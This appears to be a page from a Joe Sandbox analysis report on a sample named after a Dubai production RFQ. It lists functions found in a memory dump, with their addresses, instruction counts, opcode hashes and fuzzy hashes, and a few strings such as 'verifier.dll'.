Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: dd4f4ff66e223fe03e46cfbe27e25f4cbd125ececfe90e17d02de55d52be8202
Instruction ID: bd2a6a0548a5e0dd093f1218649ce3cf3e3558e63f3f920f286e200fe53d73b1
Opcode Fuzzy Hash: dd4f4ff66e223fe03e46cfbe27e25f4cbd125ececfe90e17d02de55d52be8202
Instruction Fuzzy Hash: 483182757002029FEB34AF5C9C50A3677E5EB88718F54852EE609DF386E7318D818764

Function 01637425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 0167442D

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction ID: b7326c51911ffbc9fe20703df7f1e316f9bb6ab7a51a4a216c947a2184cbe600
Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction Fuzzy Hash: 7741B0B5A0161ADBCF25DF88CC90BBEBBB5FF84711F00405AE945A7342DB34A942CB91

Function 016885AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 016885DE

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 77b708cf91927e3d7ed0f9e97c2298a81885d25168277430c91b375f8e262b63
Instruction ID: 2f7792e13694668c9353c2392541b7d2aab6f7391fbce6be4a9c55fd8d72467f
Opcode Fuzzy Hash: 77b708cf91927e3d7ed0f9e97c2298a81885d25168277430c91b375f8e262b63
Instruction Fuzzy Hash: 1701F236200221ABE7357F55DC88A663F6AFF44758F84176CF60217696CB20AC91CB98

Function 0165717A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6ef197778cee7ace32a1c47e9cf51e7b16f7d506fc47bdf40e30143ed691750
Instruction ID: 931ef13eecf43821c87adadd55aecbec0e2988a3402338ecc820f90bda286145
Opcode Fuzzy Hash: d6ef197778cee7ace32a1c47e9cf51e7b16f7d506fc47bdf40e30143ed691750
Instruction Fuzzy Hash: F142A171A006168FDB59CF59CC906BEBBB2FF88314F54856DD952AB341DB34E842CBA0

Function 0162B1E0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb31e3d464fc5f61648023520c023c74da9733cab60a81e565e3bd33bb01ea7
Instruction ID: 8924640ca3f1aa7f195353f15707158c9e2634a491c313e5bf51c76f84b727c2
Opcode Fuzzy Hash: fdb31e3d464fc5f61648023520c023c74da9733cab60a81e565e3bd33bb01ea7
Instruction Fuzzy Hash: D9329D76E016299BDF24DFA8CC80BAEBBB6FF54704F18412DE905AB391D7359901CB90

Function 01612760 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e876bc0b6a2a45683cb5e44e5a055b7fc1cb64ec249413855e3090b3e23c2544
Instruction ID: 71266f2212f6ba254f06cb3c40fc6347a24d5d5abeb05aa159333af4143b9040
Opcode Fuzzy Hash: e876bc0b6a2a45683cb5e44e5a055b7fc1cb64ec249413855e3090b3e23c2544
Instruction Fuzzy Hash: 8F32EC30A007658FDB25CF69DC507BEBBFAAF84704F24812DE8469B785DB35A842CB50

Function 016C124C Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e835a46c3ec6e11570b8c6b56c6b5466cc9e6316c14cbf780dcb83d599e5f87c
Instruction ID: 296158b2349445bc7ca7e03ea5d17f5c3e9b358e040e02d2799ea0ef3342843b
Opcode Fuzzy Hash: e835a46c3ec6e11570b8c6b56c6b5466cc9e6316c14cbf780dcb83d599e5f87c
Instruction Fuzzy Hash: 3722A235A00216CFDB19CF59C890ABEB7B2FF8A704B18816DD955DB346DB30E942CB90

Function 016064F0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af4ff8a989e95ec84c5f6d8064a3b4e99d9947a53394946dafbe75ac19214c6
Instruction ID: 1777c83d0c370f7a9e9255ec836e58ff80e13e0056dcbc0202a15289b577d5eb
Opcode Fuzzy Hash: 6af4ff8a989e95ec84c5f6d8064a3b4e99d9947a53394946dafbe75ac19214c6
Instruction Fuzzy Hash: 8DE17D70509342CFC71ACF28C890A6BBBE1FF89314F15896DE59587391DB31E916CB92

Function 015F8347 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11485f8b5ed8797ad291780c6c1effd291437cb78cb1c442fcd66b6a7d65d0ee
Instruction ID: ecebd0c64d79334ee924d4ae8ad983e00073bd51c4b4a0f78a8b7f787116fee1
Opcode Fuzzy Hash: 11485f8b5ed8797ad291780c6c1effd291437cb78cb1c442fcd66b6a7d65d0ee
Instruction Fuzzy Hash: C2D1CE71A0060A9BDB24DF68CC90BBEBBA6BF54304F08452DEE12DF295EB34D945CB50

Function 0160D700 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ff4b8c40b730f206139678f3182f7c8effa789cdd5e4e96a9da8ab629053e6
Instruction ID: b85464ad18085dfb734f807992836bbdb5f2c3ddac79f28cb750886ce78070c5
Opcode Fuzzy Hash: 65ff4b8c40b730f206139678f3182f7c8effa789cdd5e4e96a9da8ab629053e6
Instruction Fuzzy Hash: 42C1B571A002169BDB29CF9DCC40BAEBBB6BF84314F14825DE959AB3C0D770E941CB90

Function 01641763 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c48a03fc4e3bbceb5aadf1b6d456531eccf7bc07d5b44b99da7c5ccd3a76e49
Instruction ID: 34b3bd5524543b553f5330e9d054005be1d0bcf1396cd75d7f4273a392f4de03
Opcode Fuzzy Hash: 2c48a03fc4e3bbceb5aadf1b6d456531eccf7bc07d5b44b99da7c5ccd3a76e49
Instruction Fuzzy Hash: 62D101B1A002059FDB51DF68C980B9A7BF9BF09354F1440BAEE09DB316E731E945CBA4

Function 0161F380 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d41b6f3041f199948a6c34bbb8b204dc1b5e3d8a22344c6f59a42a6a5b41df26
Instruction ID: c896cb9956ad95a10e53a8e398e65da30ae38f2df16bd7acd99ee3f713d32b4a
Opcode Fuzzy Hash: d41b6f3041f199948a6c34bbb8b204dc1b5e3d8a22344c6f59a42a6a5b41df26
Instruction Fuzzy Hash: 76C10171A01225CBDB28CF1CCC907B9BBA1FB58704F1D81D9ED469B39AD7348945CBA0

Function 016037E4 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db453cc55e2ac3b9d790009cd8d0911a686c890703046ff9da30510e554de6af
Instruction ID: 7f40aba54c25e598194b76fef53d11f6133bdfec3d6913fddc8eb36aaeba1594
Opcode Fuzzy Hash: db453cc55e2ac3b9d790009cd8d0911a686c890703046ff9da30510e554de6af
Instruction Fuzzy Hash: 0EC156B19006099FCB2ACFA9CD50AAEBBF5FB48704F15446EE516EB390E734A901CF54

Function 01610445 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction ID: 7da3834832a36e866a92b70974f64fb92a4d9a7cb741d8dca41b84560debebf0
Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction Fuzzy Hash: 0CB1C331604646EFDB25CBA8CC90BBEBBFAAF84314F180569E6529B385DB30D981C750

Function 016082E0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f626360f9b9276d826497d6505ee3bcaa3e7c03be91d92d638918ebcf181e3
Instruction ID: 4fa08638229c2b84c98e4329153235c119c3576356a273988c7020f69777fd01
Opcode Fuzzy Hash: b0f626360f9b9276d826497d6505ee3bcaa3e7c03be91d92d638918ebcf181e3
Instruction Fuzzy Hash: D6C155706083818FE765CF18C894BABB7E9BF88304F44496DE98987391D774E909CF92

Function 015FC3C7 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b45abb3fc9e233322e98894db179b4578c698630b5044a22d18501e1be7f7c
Instruction ID: dc93d873221a0248b23e3b4c9b54ae8f5e85c47c33af795418ad7425f3512528
Opcode Fuzzy Hash: 09b45abb3fc9e233322e98894db179b4578c698630b5044a22d18501e1be7f7c
Instruction Fuzzy Hash: 1CB15070A0026A8BDB64DF58C894BA9B7F5BF44704F0485EED60AAB241EB309D85CF25

Function 0162E507 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e39c66035aa0af2a7e7c82af72ecce9e45bc3ac728fccbfb3a38f9d52acf5d89
Instruction ID: a76a0eb5d449b71758c1ea45cc90f6d9a42a09dd997a36184bdc4bb90c6c787d
Opcode Fuzzy Hash: e39c66035aa0af2a7e7c82af72ecce9e45bc3ac728fccbfb3a38f9d52acf5d89
Instruction Fuzzy Hash: ACA13731E00625EFEB31DB98DC54BADBBB9AB04714F0502A9EA11BB381D7759D41CBC1

Function 016400A5 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e1d10345ef064eb23c8e621fba7fc60968612c23db961dcf9475f92fa40ad2
Instruction ID: 5be6a7e15045611baf946c8d24419734008a7c7e49e4927271cc63e17493199e
Opcode Fuzzy Hash: 21e1d10345ef064eb23c8e621fba7fc60968612c23db961dcf9475f92fa40ad2
Instruction Fuzzy Hash: BBA19E71A016269FDB25DF69CD90BAABBF6FF44318F10412DFA0597381DB34A851CB90

Function 016D4080 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456f2b2915a29b53f629408bf8a2caec95eb745e7ba8bc6d4c8e7dddfc22173b
Instruction ID: 75507a65fb1136ecd3186f2b32ef67cb8e4a5df85cf69404a383696ce401d243
Opcode Fuzzy Hash: 456f2b2915a29b53f629408bf8a2caec95eb745e7ba8bc6d4c8e7dddfc22173b
Instruction Fuzzy Hash: E1A1CB72A04612AFC722DF28CD80B2ABBE9FF58704F05452CE5869BB51CB34EC51CB95

Function 0161E310 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d460c47851c339dbf46a5c4c5687b1129ec7e21da4bb41a98dbb0e81c51013e
Instruction ID: 4691af22d74f216bf108c8046951992ab5c62d3ad2cd87cd36a5df78e9cdcf5f
Opcode Fuzzy Hash: 6d460c47851c339dbf46a5c4c5687b1129ec7e21da4bb41a98dbb0e81c51013e
Instruction Fuzzy Hash: 03912231A01625CBEB26DB69CC80B7ABBA6EF84714F194069ED01DB388D735DD42C791

Function 01601051 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3fd5f8d85763f9a4ed2545f8734f85c209f361164bce2fceadbb6455a07fa5
Instruction ID: f3645f08afc4661202f93a499493165e2e29594aceeda0235ac514a596c604b0
Opcode Fuzzy Hash: 6f3fd5f8d85763f9a4ed2545f8734f85c209f361164bce2fceadbb6455a07fa5
Instruction Fuzzy Hash: 2BB103B56093418FD355CF28C880A5AFBF1BB89304F1889AEF999C7352D771E945CB82

Function 016093A6 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29caa73abe68a8e0c1f1ccc7306ef8fc12340b0112d775fa4b88ecbdd401506c
Instruction ID: 9fb90a1957ea4521f6349463f04209e21e5c12b05baebd5204e18e93ca26c3aa
Opcode Fuzzy Hash: 29caa73abe68a8e0c1f1ccc7306ef8fc12340b0112d775fa4b88ecbdd401506c
Instruction Fuzzy Hash: 74B18D749022058FDB2ACF1CDD847AABBB2BB48358F15415DD9299B3D7DB31D882CB90

Function 01607290 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6749afc11a8789ce720c06903ea08af8146806fb80369e276538d050a6e0b9c
Instruction ID: 90bd15f11e85be069f9bd56bacc73d224fe17bea35ab72fcc5fa9276af76df8a
Opcode Fuzzy Hash: d6749afc11a8789ce720c06903ea08af8146806fb80369e276538d050a6e0b9c
Instruction Fuzzy Hash: CBA16D71604342CFD71ACF28C880A2BBBE6FF98344F15496DE5859B391EB30E945CB96

Function 016BB0AF Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
Instruction ID: 657138ee316fe41d0ff1b5b02d83e6f151ce7e7281f4d388481028a62c56e6bc
Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
Instruction Fuzzy Hash: F5719D31A0221A9BDB20CF69CCD0BFEBBBAAF44651F55415ADD01AB345E734D9C1CB90

Function 0163E1A4 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069091b00fb7511e687d2b49baec6e70ebe61a951d10f8f8f3e6c971934d4af2
Instruction ID: 0c1793248948646b74ae861d7da251c65fc773a03b48aa1c0c538cc5f743b9b2
Opcode Fuzzy Hash: 069091b00fb7511e687d2b49baec6e70ebe61a951d10f8f8f3e6c971934d4af2
Instruction Fuzzy Hash: BA813F71900609AFDB15CFA8CC80AEAB7FAFF88354F14442DE555A7310DB31AD45CB60

Function 016C970B Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab0c31038177dd8f179e376de39b61e0a99212505678e25eec6a01d979f7ade
Instruction ID: 91916ea282d86f07ed57abe15486dfbb887e4b3f56174705e4e2760666710296
Opcode Fuzzy Hash: 7ab0c31038177dd8f179e376de39b61e0a99212505678e25eec6a01d979f7ade
Instruction Fuzzy Hash: B361D631B021169BEB259F68CC40BBF7BAAEF84B18F19415DE92197384DB30DD41CBA0

Function 0161C560 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1fd2db4e7bd66a880929267bf8e47478608c3d47586988a4d6934c47498b7a
Instruction ID: b588aeac1fced507135fcef9282df852cc7fc43291dd260b6a8e61fb6c217f57
Opcode Fuzzy Hash: 6e1fd2db4e7bd66a880929267bf8e47478608c3d47586988a4d6934c47498b7a
Instruction Fuzzy Hash: EB71DEB1C05629DBCB25CF68CC907BEBBB9FF49710F18451AE942AB354D734A811CBA4

Function 0161252B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9391d395e23e31cb52a7ee428d1722d74208086e388a2193a717638b41b11d19
Instruction ID: 9cace0273b157a6323c36ba6c00a8145777c603d1f44eaf1d52f47bf30aadfbb
Opcode Fuzzy Hash: 9391d395e23e31cb52a7ee428d1722d74208086e388a2193a717638b41b11d19
Instruction Fuzzy Hash: 8771CE316046528FD312DF2CC8A0B26B7E5FF84700F1885ADE859CB396DB34D846CBA1

Function 016077F9 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 414b47a8c8a7aeb9db36e3fe16d18d6b8e05eb0490bbbe5837f3d9ded7512ce0
Instruction ID: 06af72e96cfb10dfd28c6288f7c3e72ee5b73a2eb1008c220fb2f86846201667
Opcode Fuzzy Hash: 414b47a8c8a7aeb9db36e3fe16d18d6b8e05eb0490bbbe5837f3d9ded7512ce0
Instruction Fuzzy Hash: F4515B71A08341DFC72ACF29C890A2BBBE5FB88600F15496EE5D997395D730E944CB92

Function 015FB273 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18b6ab4b092a159c16279a3ec307eaf57702fff8a86d1efe855db0cfbef93b13
Instruction ID: 04358c1ae0e75c491b8a1211dcc1901fd4c23b0da4dded2f27bfd484c5833749
Opcode Fuzzy Hash: 18b6ab4b092a159c16279a3ec307eaf57702fff8a86d1efe855db0cfbef93b13
Instruction Fuzzy Hash: 8D41F272680611DBDB2A9F2DDC51B2ABBAAFF91710F15442EFA099F391D730D801CB54

Function 0167D250 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
Instruction ID: eb0804910ee4319c95869f5cede4bd5287c05ccbf93471483ffd7760275c6b37
Opcode Fuzzy Hash: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
Instruction Fuzzy Hash: 5C51D0722002139BDB11AFE8CC40ABB7BE6EF956A4F144C29FA40D7350E734D856C7A2

Function 0163B490 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d07ffa02669d4d311da28e015bae39fd7ae9eb649a3b1025fbedbed1051bda4
Instruction ID: bc1c0ef00f2f6a1a37be0cbf040a8bf65571a96d72df4007bf92f85a5deb9a0e
Opcode Fuzzy Hash: 3d07ffa02669d4d311da28e015bae39fd7ae9eb649a3b1025fbedbed1051bda4
Instruction Fuzzy Hash: 5E5106B16043169FD330EFA4DC94F6B77AAEB94724F14062DF91187291DB30D851CBA9

Function 016294FA Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c8134c7f12723c52956ea66398c04fe1677c0e12edd8218d917246fa0f8cdd
Instruction ID: 0b9e3b02c7da07628b370134c0c0fd0ba551f68835b8c01785c2ed0eb931fe59
Opcode Fuzzy Hash: c7c8134c7f12723c52956ea66398c04fe1677c0e12edd8218d917246fa0f8cdd
Instruction Fuzzy Hash: 7A51CF31A0462AAFEF219FA5CC90BEDBBB9FF41304F20412DE991A7251DB718945CF10

Function 01607072 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fbd1a6c5d26ea723af9296389db22d7883ab2a829a40cd5ee4d858db0f6529c
Instruction ID: 1a423c674de622d9e9e4e3e16b7a00b601d77b126fd17baab91c7e5140f00211
Opcode Fuzzy Hash: 3fbd1a6c5d26ea723af9296389db22d7883ab2a829a40cd5ee4d858db0f6529c
Instruction Fuzzy Hash: F15100B4A00616EFDB1ADF68CC447AEB7B5BF95316F14426AE143933D0DB70A912CB80

Function 0163E363 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e34b4c095f4b9878444364878c835ea053d2fd6942071f99b84a7ca9c52654c1
Instruction ID: 443265aa659bd6338589add0390510004e535830078530f106a8b15df2d8d95b
Opcode Fuzzy Hash: e34b4c095f4b9878444364878c835ea053d2fd6942071f99b84a7ca9c52654c1
Instruction Fuzzy Hash: B9516971200A05DFDB22EF68CD90E6AB3FAFB68754F04042EE65293661D735ED51CB60

Function 016244D1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

